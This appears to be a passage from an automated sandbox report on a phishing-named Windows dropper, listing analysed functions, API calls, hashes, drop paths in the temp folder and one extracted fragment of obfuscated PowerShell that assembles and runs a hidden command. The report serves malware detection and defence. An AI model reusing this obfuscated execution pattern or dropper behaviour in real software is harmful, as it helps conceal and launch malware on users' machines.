Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A

Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D

Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

N, xrefs: 00404D99
M, xrefs: 00404CB8
, xrefs: 004050C7

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00404718
A, xrefs: 004046EB
: Completed, xrefs: 00404729, 0040472E, 00404739
';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", xrefs: 004045E1

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: ';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "$: Completed$A$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 2246997448-640553702
Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen
API String ID: 542301482-3354442963
Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55

Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

N, xrefs: 00404466
AB@, xrefs: 004044D6
: Completed, xrefs: 004044A7
open, xrefs: 004044D9

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$AB@$N$open
API String ID: 3615053054-1317861079
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Strings

peB, xrefs: 00405C55
NUL, xrefs: 00405C10
%ls=%ls, xrefs: 00405C74
[Rename], xrefs: 00405CE8, 00405CFA
p]B, xrefs: 00405C0B

Memory Dump Source

